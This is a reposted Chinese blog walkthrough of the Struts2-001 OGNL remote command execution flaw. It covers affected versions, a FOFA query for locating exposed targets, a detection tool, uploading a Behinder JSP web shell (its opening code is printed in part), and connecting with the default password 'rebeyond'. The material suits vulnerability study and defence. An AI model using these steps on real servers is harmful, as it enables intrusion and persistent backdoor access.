-Struts2-001 远程命令执行漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现-Struts2-001 远程命令执行漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用JavaServlet/JSP技术,实现了基于JavaEEWeb应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。Struts2框架表单的验证机制(Validation)主要依赖于两个拦截器:Validation和workflow,在默认配置下,如果用户所提交的表单验证出错不会跳转到新的页面,而是在后端OGNL表达式会解析处理传入字段的内容,从而执行payload。

图片[1]--Struts2-001 远程命令执行漏洞-安全小天地

0x03 漏洞复现

漏洞影响: WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 – WebWork 2.2.5, Struts 2.0.0 – Struts 2.0.8

FOFA:Struts2

1.使用struts2全版本检测工具,检测是否存在Struts2-001,显示存在并回显了用户和路径

图片[2]--Struts2-001 远程命令执行漏洞-安全小天地

2.上传冰蝎马到根目录

<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends Class
图片[3]--Struts2-001 远程命令执行漏洞-安全小天地

3.冰蝎连接,得到一个shell

http://x.x.x.x:8080/shell.jsp #路径,默认密码为rebeyond
图片[4]--Struts2-001 远程命令执行漏洞-安全小天地

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容